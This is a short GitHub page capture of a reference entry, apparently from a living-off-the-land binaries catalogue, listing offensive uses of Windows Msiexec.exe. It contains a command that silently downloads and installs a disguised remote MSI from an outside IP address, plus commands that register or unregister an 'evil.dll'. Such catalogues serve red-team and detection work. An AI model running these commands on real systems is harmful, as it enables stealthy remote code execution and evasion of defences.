Skip to content

Latest commit

 

History

History
33 lines (26 loc) · 890 Bytes

Msiexec.exe.md

File metadata and controls

33 lines (26 loc) · 890 Bytes

Msiexec.exe


msiexec /q /i http://192.168.100.3/tmp/cmd.png
Installs the target remote & renamed .MSI file silently.

msiexec /y "C:\folder\evil.dll"
Calls DLLRegisterServer to register the target DLL.

msiexec /z "C:\folder\evil.dll"
Calls DLLRegisterServer to un-register the target DLL.

OS: